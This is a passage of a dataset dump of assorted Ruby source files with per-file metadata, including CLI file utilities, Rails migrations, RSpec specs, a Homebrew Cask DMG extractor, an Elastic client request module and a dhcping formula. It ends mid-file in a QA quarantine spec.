column              type           min    max
hexsha              stringlengths  40     40
size                int64          2      1.01M
content             stringlengths  2      1.01M
avg_line_length     float64        1.5    100
max_line_length     int64          2      1k
alphanum_fraction   float64        0.25   1
hexsha: 28713525b6abe5e6ad9c87f8c83cea11062be2e1
size: 14,336
content:
# frozen_string_literal: true require 'pathname' require 'fileutils' module Dry class CLI module Utils # Files utilities # # @since 0.3.1 module Files # rubocop:disable Metrics/ModuleLength # Creates an empty file for the given path. # All the intermediate directories are created. # If the path already exists, it doesn't change the contents # # @param path [String,Pathname] the path to file # # @since 0.3.1 def self.touch(path) mkdir_p(path) FileUtils.touch(path) end # Creates a new file or rewrites the contents # of an existing file for the given path and content # All the intermediate directories are created. # # @param path [String,Pathname] the path to file # @param content [String, Array<String>] the content to write # # @since 0.3.1 def self.write(path, *content) mkdir_p(path) open(path, ::File::CREAT | ::File::WRONLY | ::File::TRUNC, *content) # rubocop:disable LineLength, Security/Open - this isn't a call to `::Kernel.open`, but to `self.open` end # Copies source into destination. # All the intermediate directories are created. # If the destination already exists, it overrides the contents. # # @param source [String,Pathname] the path to the source file # @param destination [String,Pathname] the path to the destination file # # @since 0.3.1 def self.cp(source, destination) mkdir_p(destination) FileUtils.cp(source, destination) end # Creates a directory for the given path. # It assumes that all the tokens in `path` are meant to be a directory. # All the intermediate directories are created. # # @param path [String,Pathname] the path to directory # # @since 0.3.1 # # @see .mkdir_p # # @example # require "dry/cli/utils/files" # # Dry::CLI::Utils::Files.mkdir("path/to/directory") # # => creates the `path/to/directory` directory # # # WRONG this isn't probably what you want, check `.mkdir_p` # Dry::CLI::Utils::Files.mkdir("path/to/file.rb") # # => creates the `path/to/file.rb` directory def self.mkdir(path) FileUtils.mkdir_p(path) end # Creates a directory for the given path. # It assumes that all the tokens, but the last, in `path` are meant to be # a directory, whereas the last is meant to be a file. # All the intermediate directories are created. # # @param path [String,Pathname] the path to directory # # @since 0.3.1 # # @see .mkdir # # @example # require "dry/cli/utils/files" # # Dry::CLI::Utils::Files.mkdir_p("path/to/file.rb") # # => creates the `path/to` directory, but NOT `file.rb` # # # WRONG it doesn't create the last directory, check `.mkdir` # Dry::CLI::Utils::Files.mkdir_p("path/to/directory") # # => creates the `path/to` directory def self.mkdir_p(path) Pathname.new(path).dirname.mkpath end # Deletes given path (file). # # @param path [String,Pathname] the path to file # # @raise [Errno::ENOENT] if the path doesn't exist # # @since 0.3.1 def self.delete(path) FileUtils.rm(path) end # Deletes given path (directory). 
# # @param path [String,Pathname] the path to file # # @raise [Errno::ENOENT] if the path doesn't exist # # @since 0.3.1 def self.delete_directory(path) FileUtils.remove_entry_secure(path) end # Adds a new line at the top of the file # # @param path [String,Pathname] the path to file # @param line [String] the line to add # # @raise [Errno::ENOENT] if the path doesn't exist # # @see .append # # @since 0.3.1 def self.unshift(path, line) content = ::File.readlines(path) content.unshift("#{line}\n") write(path, content) end # Adds a new line at the bottom of the file # # @param path [String,Pathname] the path to file # @param contents [String] the contents to add # # @raise [Errno::ENOENT] if the path doesn't exist # # @see .unshift # # @since 0.3.1 def self.append(path, contents) mkdir_p(path) content = ::File.readlines(path) content << "\n" unless content.last.end_with?("\n") content << "#{contents}\n" write(path, content) end # Replace first line in `path` that contains `target` with `replacement`. # # @param path [String,Pathname] the path to file # @param target [String,Regexp] the target to replace # @param replacement [String] the replacement # # @raise [Errno::ENOENT] if the path doesn't exist # @raise [ArgumentError] if `target` cannot be found in `path` # # @see .replace_last_line # # @since 0.3.1 def self.replace_first_line(path, target, replacement) content = ::File.readlines(path) content[index(content, path, target)] = "#{replacement}\n" write(path, content) end # Replace last line in `path` that contains `target` with `replacement`. # # @param path [String,Pathname] the path to file # @param target [String,Regexp] the target to replace # @param replacement [String] the replacement # # @raise [Errno::ENOENT] if the path doesn't exist # @raise [ArgumentError] if `target` cannot be found in `path` # # @see .replace_first_line # # @since 0.3.1 def self.replace_last_line(path, target, replacement) content = ::File.readlines(path) content[-index(content.reverse, path, target) - 1] = "#{replacement}\n" write(path, content) end # Inject `contents` in `path` before `target`. # # @param path [String,Pathname] the path to file # @param target [String,Regexp] the target to replace # @param contents [String] the contents to inject # # @raise [Errno::ENOENT] if the path doesn't exist # @raise [ArgumentError] if `target` cannot be found in `path` # # @see .inject_line_after # @see .inject_line_before_last # @see .inject_line_after_last # # @since 0.3.1 def self.inject_line_before(path, target, contents) _inject_line_before(path, target, contents, method(:index)) end # Inject `contents` in `path` after last `target`. # # @param path [String,Pathname] the path to file # @param target [String,Regexp] the target to replace # @param contents [String] the contents to inject # # @raise [Errno::ENOENT] if the path doesn't exist # @raise [ArgumentError] if `target` cannot be found in `path` # # @see .inject_line_before # @see .inject_line_after # @see .inject_line_after_last # # @since 1.3.0 def self.inject_line_before_last(path, target, contents) _inject_line_before(path, target, contents, method(:rindex)) end # Inject `contents` in `path` after `target`. 
# # @param path [String,Pathname] the path to file # @param target [String,Regexp] the target to replace # @param contents [String] the contents to inject # # @raise [Errno::ENOENT] if the path doesn't exist # @raise [ArgumentError] if `target` cannot be found in `path` # # @see .inject_line_before # @see .inject_line_before_last # @see .inject_line_after_last # # @since 0.3.1 def self.inject_line_after(path, target, contents) _inject_line_after(path, target, contents, method(:index)) end # Inject `contents` in `path` after last `target`. # # @param path [String,Pathname] the path to file # @param target [String,Regexp] the target to replace # @param contents [String] the contents to inject # # @raise [Errno::ENOENT] if the path doesn't exist # @raise [ArgumentError] if `target` cannot be found in `path` # # @see .inject_line_before # @see .inject_line_after # @see .inject_line_before_last # @see .inject_line_after_last # # @since 1.3.0 def self.inject_line_after_last(path, target, contents) _inject_line_after(path, target, contents, method(:rindex)) end # Removes line from `path`, matching `target`. # # @param path [String,Pathname] the path to file # @param target [String,Regexp] the target to remove # # @raise [Errno::ENOENT] if the path doesn't exist # @raise [ArgumentError] if `target` cannot be found in `path` # # @since 0.3.1 def self.remove_line(path, target) content = ::File.readlines(path) i = index(content, path, target) content.delete_at(i) write(path, content) end # Removes `target` block from `path` # # @param path [String,Pathname] the path to file # @param target [String] the target block to remove # # @raise [Errno::ENOENT] if the path doesn't exist # @raise [ArgumentError] if `target` cannot be found in `path` # # @since 0.3.1 # # @example # require "dry/cli/utils/files" # # puts File.read("app.rb") # # # class App # # configure do # # root __dir__ # # end # # end # # Dry::CLI::Utils::Files.remove_block("app.rb", "configure") # # puts File.read("app.rb") # # # class App # # end def self.remove_block(path, target) content = ::File.readlines(path) starting = index(content, path, target) line = content[starting] size = line[/\A[[:space:]]*/].bytesize closing = (' ' * size) + (target.match?(/{/) ? '}' : 'end') ending = starting + index(content[starting..-1], path, closing) content.slice!(starting..ending) write(path, content) remove_block(path, target) if match?(content, target) end # Checks if `path` exist # # @param path [String,Pathname] the path to file # # @return [TrueClass,FalseClass] the result of the check # # @since 0.3.1 # # @example # require "dry/cli/utils/files" # # Dry::CLI::Utils::Files.exist?(__FILE__) # => true # Dry::CLI::Utils::Files.exist?(__dir__) # => true # # Dry::CLI::Utils::Files.exist?("missing_file") # => false def self.exist?(path) File.exist?(path) end # Checks if `path` is a directory # # @param path [String,Pathname] the path to directory # # @return [TrueClass,FalseClass] the result of the check # # @since 0.3.1 # # @example # require "dry/cli/utils/files" # # Dry::CLI::Utils::Files.directory?(__dir__) # => true # Dry::CLI::Utils::Files.directory?(__FILE__) # => false # # Dry::CLI::Utils::Files.directory?("missing_directory") # => false def self.directory?(path) File.directory?(path) end # private # @since 0.3.1 # @api private def self.match?(content, target) !line_number(content, target).nil? end private_class_method :match? 
# @since 0.3.1 # @api private def self.open(path, mode, *content) ::File.open(path, mode) do |file| file.write(Array(content).flatten.join) end end private_class_method :open # @since 0.3.1 # @api private def self.index(content, path, target) line_number(content, target) || raise(ArgumentError, "Cannot find `#{target}' inside `#{path}'.") end private_class_method :index # @since 1.3.0 # @api private def self.rindex(content, path, target) line_number(content, target, finder: content.method(:rindex)) || raise(ArgumentError, "Cannot find `#{target}' inside `#{path}'.") end private_class_method :rindex # @since 1.3.0 # @api private def self._inject_line_before(path, target, contents, finder) content = ::File.readlines(path) i = finder.call(content, path, target) content.insert(i, "#{contents}\n") write(path, content) end private_class_method :_inject_line_before # @since 1.3.0 # @api private def self._inject_line_after(path, target, contents, finder) content = ::File.readlines(path) i = finder.call(content, path, target) content.insert(i + 1, "#{contents}\n") write(path, content) end private_class_method :_inject_line_after # @since 0.3.1 # @api private def self.line_number(content, target, finder: content.method(:index)) finder.call do |l| case target when ::String l.include?(target) when Regexp l =~ target end end end private_class_method :line_number end end end end
avg_line_length: 32.288288
max_line_length: 181
alphanum_fraction: 0.547921
hexsha: bbada9092345d7a7343d453ca1a7374b0eb617f6
size: 160
content:

module AutotestNotification #:nodoc:
  module VERSION #:nodoc:
    MAJOR = 1
    MINOR = 6
    TINY  = 0

    STRING = [MAJOR, MINOR, TINY].join('.')
  end
end

avg_line_length: 16
max_line_length: 43
alphanum_fraction: 0.6
hexsha: b96894a3aef2dd4a2ab97539ef393f899808a155
size: 3,173
content:

require 'netaddr'

module VCAP::CloudController
  class SecurityGroup < Sequel::Model
    SECURITY_GROUP_NAME_REGEX = /\A[[:alnum:][:punct:][:print:]]+\Z/
    MAX_RULES_CHAR_LENGTH = 2**24 - 1

    plugin :serialization

    import_attributes :name, :rules, :running_default, :staging_default, :space_guids
    export_attributes :name, :rules, :running_default, :staging_default

    serialize_attributes :json, :rules

    many_to_many :spaces
    many_to_many :staging_spaces,
      class: 'VCAP::CloudController::Space',
      join_table: 'staging_security_groups_spaces',
      right_key: :staging_space_id,
      left_key: :staging_security_group_id

    add_association_dependencies spaces: :nullify, staging_spaces: :nullify

    def validate
      validates_presence :name
      validates_unique :name
      validates_format SECURITY_GROUP_NAME_REGEX, :name
      validate_rules_length
      validate_rules
    end

    def self.user_visibility_filter(user)
      managed_organizations_spaces_dataset = Space.where(id: user.managed_organizations_dataset.
        join(:spaces, spaces__organization_id: :organizations__id).
        select(:spaces__id))

      Sequel.or([
        [:spaces, user.spaces_dataset],
        [:spaces, user.managed_spaces_dataset],
        [:spaces, user.audited_spaces_dataset],
        [:spaces, managed_organizations_spaces_dataset],
        [:staging_spaces, user.spaces_dataset],
        [:staging_spaces, user.managed_spaces_dataset],
        [:staging_spaces, user.audited_spaces_dataset],
        [:staging_spaces, managed_organizations_spaces_dataset],
        [:running_default, true],
        [:staging_default, true],
      ])
    end

    private

    def validate_rules_length
      return if self[:rules].nil?

      # use this instead of validates_max_length b/c we care about the serialized
      # value that is happening due to our use of the serialize_attributes on rules column
      if self[:rules].length > MAX_RULES_CHAR_LENGTH
        errors.add(:rules, "length must not exceed #{MAX_RULES_CHAR_LENGTH} characters")
      end
    end

    def validate_rules
      return true unless rules

      unless rules.is_a?(Array) && rules.all? { |r| r.is_a?(Hash) }
        errors.add(:rules, "value must be an array of hashes. rules: '#{rules}'")
        return false
      end

      rules.each_with_index do |rule, index|
        protocol = rule['protocol']

        validation_errors = case protocol
                            when 'tcp', 'udp'
                              CloudController::TransportRuleValidator.validate(rule)
                            when 'icmp'
                              CloudController::ICMPRuleValidator.validate(rule)
                            when 'all'
                              CloudController::RuleValidator.validate(rule)
                            else
                              ['contains an unsupported protocol']
                            end

        validation_errors.each do |error_text|
          errors.add(:rules, "rule number #{index + 1} #{error_text}")
        end
        errors.empty?
      end
    end
  end
end

avg_line_length: 33.755319
max_line_length: 90
alphanum_fraction: 0.630003
hexsha: e864632d8c52004c615e67c86092206970c6999b
size: 299
content:

class CreateVolunteers < ActiveRecord::Migration[5.0]
  def change
    create_table :volunteers do |t|
      t.string :name
      t.string :phone
      t.string :email
      t.string :address
      t.string :city
      t.string :state
      t.string :zip

      t.timestamps
    end
  end
end

avg_line_length: 18.6875
max_line_length: 53
alphanum_fraction: 0.602007
hexsha: 0890fbda59b419c192f2f8984528e27f23f986bb
size: 4,396
content:
require 'spec_helper' require 'oily_png' describe SnapshotComparer do describe '#compare!' do let(:snapshot_after) { build(:snapshot) } let(:snapshot_before) { build(:snapshot) } let(:snapshot_comparer) do SnapshotComparer.new(snapshot_after, snapshot_before) end subject { snapshot_comparer.compare! } context 'with identical snapshots' do before do snapshot_comparer.stubs(:to_chunky_png) .returns(ChunkyPNG::Image.new(2, 2, ChunkyPNG::Color::WHITE)) end it 'should report no difference' do subject[:diff_in_percent].should == 0.0 end it 'should report no diff image' do subject[:diff_image].should be_nil end it 'should report no cluster differences' do subject[:diff_clusters].should be_empty end end context 'with entirely different snapshots' do before do snapshot_comparer.stubs(:to_chunky_png).with(snapshot_after) .returns(ChunkyPNG::Image.new(2, 2, ChunkyPNG::Color::WHITE)) snapshot_comparer.stubs(:to_chunky_png).with(snapshot_before) .returns(ChunkyPNG::Image.new(2, 2, ChunkyPNG::Color::BLACK)) end it 'should report a 100% difference' do subject[:diff_in_percent].should == 100.0 end it 'should report a diff image' do subject[:diff_image].should_not be_nil end it 'should report one cluster difference' do subject[:diff_clusters].count.should == 1 end end context 'when the after snapshot is half as tall as the before snapshot' do before do snapshot_comparer.stubs(:to_chunky_png).with(snapshot_after) .returns(ChunkyPNG::Image.new(2, 2, ChunkyPNG::Color::BLACK)) snapshot_comparer.stubs(:to_chunky_png).with(snapshot_before) .returns(ChunkyPNG::Image.new(2, 1, ChunkyPNG::Color::BLACK)) end it 'should report a 50% difference' do subject[:diff_in_percent].should == 50.0 end it 'should report one cluster difference' do subject[:diff_clusters].count.should == 1 end end context 'when the after snapshot is twice as tall as the before snapshot' do before do snapshot_comparer.stubs(:to_chunky_png).with(snapshot_after) .returns(ChunkyPNG::Image.new(2, 2, ChunkyPNG::Color::BLACK)) snapshot_comparer.stubs(:to_chunky_png).with(snapshot_before) .returns(ChunkyPNG::Image.new(2, 4, ChunkyPNG::Color::BLACK)) end it 'should report a 50% difference' do subject[:diff_in_percent].should == 50.0 end it 'returns an image of the correct height' do subject[:diff_image].height.should == 4 end it 'should report one cluster difference' do subject[:diff_clusters].count.should == 1 end end context 'when the after snapshot half as wide as the before snapshot' do before do snapshot_comparer.stubs(:to_chunky_png).with(snapshot_after) .returns(ChunkyPNG::Image.new(2, 2, ChunkyPNG::Color::BLACK)) snapshot_comparer.stubs(:to_chunky_png).with(snapshot_before) .returns(ChunkyPNG::Image.new(1, 2, ChunkyPNG::Color::BLACK)) end it 'should report a 100% difference' do subject[:diff_in_percent].should == 100.0 end end context 'when the before snapshot is twice as wide as the before snapshot' do before do snapshot_comparer.stubs(:to_chunky_png).with(snapshot_after) .returns(ChunkyPNG::Image.new(2, 2, ChunkyPNG::Color::BLACK)) snapshot_comparer.stubs(:to_chunky_png).with(snapshot_before) .returns(ChunkyPNG::Image.new(4, 2, ChunkyPNG::Color::BLACK)) end it 'should report a 100% difference' do subject[:diff_in_percent].should == 100.0 end end context 'when the after snapshot is twice as wide as the before snapshot' do before do snapshot_comparer.stubs(:to_chunky_png).with(snapshot_after) .returns(ChunkyPNG::Image.new(4, 2, ChunkyPNG::Color::BLACK)) snapshot_comparer.stubs(:to_chunky_png).with(snapshot_before) .returns(ChunkyPNG::Image.new(2, 
2, ChunkyPNG::Color::BLACK)) end it 'should report a 100% difference' do subject[:diff_in_percent].should == 100.0 end end end end
avg_line_length: 33.557252
max_line_length: 81
alphanum_fraction: 0.660146
hexsha: ac06cdc80f6e980e46958401f46c7afdb39884fa
size: 1,335
content:

class NewRelic::MetricParser::View < NewRelic::MetricParser
  def is_view?; true; end

  def is_render?
    segments.last == "Rendering"
  end

  def is_compiler?
    segments.last == "Compile"
  end

  def pie_chart_label
    case segments.last
    when "Rendering"
      "#{file_name(segments[-2])} Template"
    when "Partial"
      "#{file_name(segments[-2])} Partial"
    when ".rhtml Processing"
      "ERB compilation"
    else
      segments[1..-1]
    end
  end

  def template_label
    case segments.last
    when "Rendering"
      "#{file_name(segments[1..-2].join(NewRelic::MetricParser::SEPARATOR))} Template"
    when "Partial"
      "#{file_name(segments[1..-2].join(NewRelic::MetricParser::SEPARATOR))} Partial"
    when ".rhtml Processing"
      "ERB compilation"
    else
      segments[1..-1].join("/")
    end
  end

  def short_name
    segments[1..-2].join(NewRelic::MetricParser::SEPARATOR)
  end

  def controller_name
    template_label
  end

  def action_name
    # Strip the extension
    segments[-2].gsub(/\..*$/, "")
  end

  def developer_name
    template_label
  end

  def url
    '/' + file_name(segments[1..-2].join('/'))
  end

  private

  def file_name(path)
    label = path.gsub /\.html\.rhtml/, '.rhtml'
    label = segments[1] if label.empty?
    label
  end
end

avg_line_length: 21.532258
max_line_length: 88
alphanum_fraction: 0.619476
hexsha: f7da90af5eb8bd5aaf22dbc17e25ff9c7e461d9f
size: 2,297
content:

class Cask::Container::Dmg < Cask::Container::Base
  def self.me?(criteria)
    criteria.imageinfo != ''
  end

  attr_reader :mounts

  def initialize(*args)
    super(*args)
    @mounts = []
  end

  def extract
    mount!
    assert_mounts_found
    @mounts.each do |mount|
      @command.run('/usr/bin/ditto',
                   # todo
                   # per https://github.com/caskroom/homebrew-cask/issues/6382, ditto
                   # complains to stderr about unreadable .Trashes directories, so all
                   # stderr output is silenced for now. But better solutions would be
                   # - use the --bom option to ditto to selectively avoid certain files
                   #   - .Trashes
                   #   - symlinks to Applications
                   # - or support some type of text filter to be passed to
                   #   :print_stderr instead of true/false
                   :print_stderr => false,
                   :args => ['--', mount, @cask.destination_path])
    end
  ensure
    eject!
  end

  def mount!
    plist = @command.run('/usr/bin/hdiutil',
      # realpath is a failsafe against unusual filenames
      :args => %w[mount -plist -nobrowse -readonly -noidme -mountrandom /tmp] + [Pathname.new(@path).realpath],
      :input => %w[y]
    ).plist
    @mounts = mounts_from_plist(plist)
  end

  def mounts_from_plist(plist)
    return [] unless plist.respond_to?(:fetch)
    plist.fetch('system-entities', []).map do |entity|
      entity['mount-point']
    end.compact
  end

  def assert_mounts_found
    if @mounts.empty?
      raise CaskError.new %Q{No mounts found in '#{@path}'; perhaps it is a bad DMG?}
    end
  end

  def eject!
    @mounts.each do |mount|
      # realpath is a failsafe against unusual filenames
      mountpath = Pathname.new(mount).realpath
      next unless mountpath.exist?
      @command.run('/usr/sbin/diskutil',
                   :args => ['eject', mountpath],
                   :print_stderr => false)
      next unless mountpath.exist?
      sleep 1
      @command.run('/usr/sbin/diskutil',
                   :args => ['eject', mountpath],
                   :print_stderr => false)
      next unless mountpath.exist?
      raise CaskError.new "Failed to eject #{mountpath}"
    end
  end
end

avg_line_length: 31.465753
max_line_length: 111
alphanum_fraction: 0.581628
hexsha: 7a4ff5d3783b961ce743f64e449497b77b61e992
size: 170
content:

class AddUsernameToUsers < ActiveRecord::Migration[5.1]
  def change
    add_column :users, :username, :string
    add_index :users, :username, :unique => true
  end
end

avg_line_length: 24.285714
max_line_length: 55
alphanum_fraction: 0.717647
hexsha: edcf552ec41a4267bdb71ecacaed9ed993e1bab7
size: 1,461
content:

# frozen_string_literal: true

require "#{ROOT_DIR}/lib/custom_facts/version"
require "#{ROOT_DIR}/lib/custom_facts/core/logging"
require "#{ROOT_DIR}/lib/custom_facts/core/legacy_facter"
require "#{ROOT_DIR}/lib/custom_facts/util/fact"
require "#{ROOT_DIR}/lib/custom_facts/util/collection"
require "#{ROOT_DIR}/lib/custom_facts/util/fact"
require "#{ROOT_DIR}/lib/custom_facts/util/loader"
require "#{ROOT_DIR}/lib/custom_facts/core/execution/base"
require "#{ROOT_DIR}/lib/custom_facts/core/execution/windows"
require "#{ROOT_DIR}/lib/custom_facts/core/execution/posix"
require "#{ROOT_DIR}/lib/custom_facts/util/values"
require "#{ROOT_DIR}/lib/custom_facts/util/confine"
require "#{ROOT_DIR}/lib/custom_facts/util/config"
require "#{ROOT_DIR}/lib/custom_facts/util/normalization"
require "#{ROOT_DIR}/lib/custom_facts/core/execution"
require "#{ROOT_DIR}/lib/custom_facts/core/resolvable"
require "#{ROOT_DIR}/lib/custom_facts/core/suitable"
require "#{ROOT_DIR}/lib/custom_facts/util/resolution"
require "#{ROOT_DIR}/lib/custom_facts/core/directed_graph"
require "#{ROOT_DIR}/lib/custom_facts/core/resolvable"
require "#{ROOT_DIR}/lib/custom_facts/core/aggregate"
require "#{ROOT_DIR}/lib/custom_facts/util/composite_loader"
require "#{ROOT_DIR}/lib/custom_facts/util/parser"
require "#{ROOT_DIR}/lib/custom_facts/util/directory_loader"
require "#{ROOT_DIR}/lib/custom_facts/util/nothing_loader"
require "#{ROOT_DIR}/lib/custom_facts/util/nothing_loader"

avg_line_length: 50.37931
max_line_length: 61
alphanum_fraction: 0.798768
hexsha: 7aa5801ddb271e69a76ec85fbd6d753807733f88
size: 3,334
content:

# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.

# frozen_string_literal: true

require 'net/https'
require 'json'
require 'elastic/enterprise-search/exceptions'
require 'base64'

module Elastic
  module EnterpriseSearch
    CLIENT_NAME = 'elastic-enteprise-search-ruby'
    CLIENT_VERSION = Elastic::EnterpriseSearch::VERSION

    # Module included in Elastic::Enterprise::Client for http requests.
    module Request
      def get(path, params = {}, headers = {})
        request(:get, path, params, headers)
      end

      def post(path, params = {}, body = {}, headers = {})
        request(:post, path, params, body, headers)
      end

      def put(path, params = {}, body = {}, headers = {})
        request(:put, path, params, body, headers)
      end

      def delete(path, params = {}, headers = {})
        request(:delete, path, params, headers)
      end

      # Construct and send a request to the API.
      def request(method, path, params = {}, body = {}, headers = {})
        meta_headers = {
          authorization: decide_authorization(params),
          user_agent: request_user_agent
        }
        headers = if !headers.is_a?(Hash)
                    meta_headers
                  else
                    headers.merge(meta_headers)
                  end

        @transport.perform_request(method.to_s.upcase, path, params, body, headers)
      end

      def setup_authentication_header
        if instance_of? Elastic::EnterpriseSearch::Client
          basic_auth_header
        else
          case http_auth
          when Hash
            basic_auth_header
          when String
            "Bearer #{http_auth}"
          end
        end
      end

      def basic_auth_header
        credentials = Base64.strict_encode64("#{http_auth[:user]}:#{http_auth[:password]}")
        "Basic #{credentials}"
      end

      private

      def request_user_agent
        ua = "#{CLIENT_NAME}/#{CLIENT_VERSION}"
        meta = ["RUBY_VERSION: #{RUBY_VERSION}"]
        if RbConfig::CONFIG && RbConfig::CONFIG['host_os']
          meta << "#{RbConfig::CONFIG['host_os'].split('_').first[/[a-z]+/i].downcase} " \
                  "#{RbConfig::CONFIG['target_cpu']}"
        end
        meta << "elastic-transport: #{Elastic::Transport::VERSION}"
        "#{ua} (#{meta.join('; ')})"
      end

      def decide_authorization(params)
        if params[:grant_type] == 'authorization_code'
          "Bearer #{params[:code]}"
        elsif params[:access_token]
          "Bearer #{params.delete(:access_token)}"
        else
          setup_authentication_header
        end
      end
    end
  end
end

avg_line_length: 32.368932
max_line_length: 102
alphanum_fraction: 0.629574
hexsha: bba02a665e16ee38109dff6641a181de89063e11
size: 183
content:

class CreateUser < ActiveRecord::Migration
  def change
    create_table :users do |t|
      t.string :username
      t.string :email
      t.string :password_digest
    end
  end
end

avg_line_length: 18.3
max_line_length: 42
alphanum_fraction: 0.672131
hexsha: 1d4b780aa87c00b1f73e0109c807f96433199a63
size: 809
content:

class Dhcping < Formula
  desc "Perform a dhcp-request to check whether a dhcp-server is running"
  homepage "http://www.mavetju.org/unix/general.php"
  url "http://www.mavetju.org/download/dhcping-1.2.tar.gz"
  mirror "https://mirrors.kernel.org/debian/pool/main/d/dhcping/dhcping_1.2.orig.tar.gz"
  sha256 "32ef86959b0bdce4b33d4b2b216eee7148f7de7037ced81b2116210bc7d3646a"

  bottle do
    cellar :any
    sha256 "7741adb9bc166ee2450e521f7468e2b023632e737eb4da065848c5e87b6bd35a" => :yosemite
    sha256 "49206410d2fc5259798c2a76ee871df08c54772d1501d7ce1d29be652d600905" => :mavericks
    sha256 "4da8d1813dd16242c02ccea50549ac5eca0048475f9a6118b525677d6c72fda2" => :mountain_lion
  end

  def install
    system "./configure", "--prefix=#{prefix}", "--mandir=#{man}"
    system "make", "install"
  end
end

avg_line_length: 40.45
max_line_length: 95
alphanum_fraction: 0.771323
hexsha: 28a541a6c604abadb57fa101abcca79fe04c05ae
size: 4,729
content:
require "helper" module Neovim RSpec.describe LineRange do let(:client) { Support.persistent_client } let(:buffer) { client.current.buffer } let(:line_range) { LineRange.new(buffer) } before do buffer.set_lines(0, -1, true, ["1", "2", "3", "4"]) end describe "#each" do it "yields each line" do yielded = [] line_range.each { |line| yielded << line } expect(yielded).to eq(["1", "2", "3", "4"]) end it "yields a large number of lines" do lines = Array.new(6000, "x") buffer.set_lines(0, -1, true, lines) yielded = [] line_range.each { |line| yielded << line } expect(yielded).to eq(lines) end end describe "#to_a" do it "returns lines as an array" do expect(line_range.to_a).to eq(["1", "2", "3", "4"]) end it "returns a large number of lines as an array" do lines = Array.new(6000, "x") buffer.set_lines(0, -1, true, lines) expect(line_range.to_a).to eq(lines) end end describe "#==" do it "compares line contents" do client.command("new") buffer2 = client.current.buffer expect(buffer2.lines == buffer.lines).to eq(false) buffer2.set_lines(0, -1, true, ["1", "2", "3", "4"]) expect(buffer2.lines == buffer.lines).to eq(true) end end describe "#[]" do it "accepts a single index" do expect(line_range[1]).to eq("2") expect(line_range[-1]).to eq("4") expect(line_range[-2]).to eq("3") end it "accepts an index and length" do expect(line_range[0, 2]).to eq(["1", "2"]) expect(line_range[-2, 2]).to eq(["3", "4"]) expect(line_range[-2, 3]).to eq(["3", "4"]) expect do line_range[2, 3] end.to raise_error(/out of bounds/) end it "accepts a range" do expect(line_range[0..1]).to eq(["1", "2"]) expect(line_range[0...1]).to eq(["1"]) expect(line_range[0..-1]).to eq(["1", "2", "3", "4"]) expect(line_range[0..-2]).to eq(["1", "2", "3"]) expect(line_range[-3..-2]).to eq(["2", "3"]) expect(line_range[0..-5]).to eq([]) expect(line_range[0...-4]).to eq([]) expect(line_range[-2..-3]).to eq([]) expect do line_range[2..4] end.to raise_error(/out of bounds/) end end describe "#[]=" do it "accepts a single index" do expect(line_range[0] = "foo").to eq("foo") expect(line_range.to_a).to eq(["foo", "2", "3", "4"]) expect(line_range[-1] = "bar").to eq("bar") expect(line_range.to_a).to eq(["foo", "2", "3", "bar"]) expect do line_range[-5] = "foo" end.to raise_error(/out of bounds/) end it "accepts an index and length" do expect(line_range[0, 2] = ["foo"]).to eq(["foo"]) expect(line_range.to_a).to eq(["foo", "3", "4"]) expect(line_range[-2, 2] = ["bar"]).to eq(["bar"]) expect(line_range.to_a).to eq(["foo", "bar"]) expect(line_range[0, 2] = "baz").to eq("baz") expect(line_range.to_a).to eq(["baz"]) expect do line_range[0, 5] = "foo" end.to raise_error(/out of bounds/) end it "accepts a range" do expect(line_range[0..1] = ["foo"]).to eq(["foo"]) expect(line_range.to_a).to eq(["foo", "3", "4"]) expect(line_range[0...1] = ["bar"]).to eq(["bar"]) expect(line_range.to_a).to eq(["bar", "3", "4"]) expect(line_range[0..-2] = ["baz"]).to eq(["baz"]) expect(line_range.to_a).to eq(["baz", "4"]) expect(line_range[0...2] = "qux").to eq("qux") expect(line_range.to_a).to eq(["qux"]) end end describe "#replace" do it "replaces all lines" do line_range.replace(["4", "5"]) expect(line_range.to_a).to eq(["4", "5"]) end end describe "#delete" do it "deletes the line at the given index" do expect do line_range.delete(0) end.to change { line_range.to_a }.to(["2", "3", "4"]) expect do line_range.delete(-1) end.to change { line_range.to_a }.to(["2", "3"]) expect do line_range.delete(-2) end.to change { line_range.to_a }.to(["3"]) end it "returns the line deleted" 
do expect(line_range.delete(0)).to eq("1") expect(line_range.delete(-1)).to eq("4") end it "returns nil if provided a non-integer" do expect do expect(line_range.delete(:foo)).to eq(nil) end.not_to change { line_range.to_a } end end end end
avg_line_length: 28.14881
max_line_length: 63
alphanum_fraction: 0.525904
hexsha: d5c6820f0a9b5f880342f5bdd8e5aeb524d7eae7
size: 8,645
content:
# frozen_string_literal: true require 'rspec/core/sandbox' # We need a reporter for internal tests that's different from the reporter for # external tests otherwise the results will be mixed up. We don't care about # most reporting, but we do want to know if a test fails class RaiseOnFailuresReporter < RSpec::Core::NullReporter def self.example_failed(example) raise example.exception end end # We use an example group wrapper to prevent the state of internal tests # expanding into the global state # See: https://github.com/rspec/rspec-core/issues/2603 def describe_successfully(*args, &describe_body) example_group = RSpec.describe(*args, &describe_body) ran_successfully = example_group.run RaiseOnFailuresReporter expect(ran_successfully).to eq true example_group end RSpec.configure do |c| c.around do |ex| RSpec::Core::Sandbox.sandboxed do |config| # If there is an example-within-an-example, we want to make sure the inner example # does not get a reference to the outer example (the real spec) if it calls # something like `pending` config.before(:context) { RSpec.current_example = nil } config.color_mode = :off # Load airborne again to avoid "undefined method `match_expected_default?'" errors # that happen because a hook calls a method added via a custom RSpec setting # that is removed when the RSpec configuration is sandboxed. # If this needs to be changed (e.g., to load other libraries as well), see # this discussion for alternative solutions: # https://gitlab.com/gitlab-org/gitlab-foss/merge_requests/25223#note_143392053 load 'airborne.rb' ex.run end end end describe QA::Specs::Helpers::Quarantine do describe '.skip_or_run_quarantined_contexts' do context 'with no tag focused' do before do described_class.configure_rspec end it 'skips before hooks of quarantined contexts' do executed_hooks = [] group = describe_successfully('quarantine', :quarantine) do before(:all) do executed_hooks << :before_all end before do executed_hooks << :before end example {} end expect(executed_hooks).to eq [] expect(group.descendant_filtered_examples.first.execution_result.status).to eq(:pending) expect(group.descendant_filtered_examples.first.execution_result.pending_message) .to eq('In quarantine') 